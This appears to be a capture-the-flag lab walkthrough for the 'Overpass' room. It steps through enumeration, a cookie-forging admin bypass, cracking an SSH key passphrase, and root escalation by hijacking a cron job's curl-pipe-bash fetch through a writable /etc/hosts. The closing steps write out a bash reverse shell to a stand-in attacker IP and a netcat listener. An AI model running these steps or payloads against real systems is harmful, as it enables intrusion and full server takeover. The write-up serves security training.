Overpass

intermediate50 minWriteup

A security company's own server compromised

Learning Objectives

  • Find web vulnerabilities
  • Exploit authentication
  • Analyze custom encryption
  • Exploit cron job

Overpass features a custom password manager with weak encryption, cookie manipulation for auth bypass, and cron job exploitation.

Walkthrough

bash
1606070;"># Step 1: Enumeration
2nmap -sV TARGET_IP
3606070;"># 22 SSH, 80 HTTP
4 
5gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
6606070;"># Found: /admin
7 
8606070;"># Step 2: Authentication Bypass
9606070;"># Check /admin/login.js
10606070;"># Cookie-based auth: SessionToken
11 
12606070;"># In browser DevTools (F12):
13606070;"># Application > Cookies > Add:
14606070;"># Name: SessionToken
15606070;"># Value: anything (e.g., "admin")
16 
17606070;"># Refresh /admin - bypassed!
18606070;"># Page shows SSH private key for james
19 
20606070;"># Step 3: Crack SSH Key
21606070;"># Save key, crack passphrase
22ssh2john james_id_rsa > hash.txt
23john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
24606070;"># Passphrase: james13
25 
26606070;"># Step 4: SSH Access
27chmod 600 james_id_rsa
28ssh -i james_id_rsa james@TARGET_IP
29cat user.txt
30 
31606070;"># Also found: .overpass (password manager file)
32606070;"># Download and analyze the custom encryption
33 
34606070;"># Step 5: Cron Job Analysis
35cat /etc/crontab
36606070;"># * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
37 
38606070;"># Check /etc/hosts - writable!
39606070;"># Add: YOUR_IP overpass.thm
40 
41606070;"># Step 6: Host Malicious Script
42mkdir -p downloads/src
43echo 606070;">#a5d6ff;">'bash -i >& /dev/tcp/YOUR_IP/6666 0>&1' > downloads/src/buildscript.sh
44python3 -m http.server 80
45 
46nc -lvnp 6666
47606070;"># Wait for cron - root shell!

Writable /etc/hosts

If /etc/hosts is writable, you can redirect domain lookups to your IP. Combined with cron jobs that fetch scripts, this is a path to root.

Knowledge Check

Quick Quiz
Question 1 of 1

How was the admin login bypassed?

Key Takeaways

  • Review JavaScript for authentication logic flaws
  • Cookie-based auth may not validate values properly
  • Writable /etc/hosts enables domain hijacking
  • Cron jobs fetching external scripts are dangerous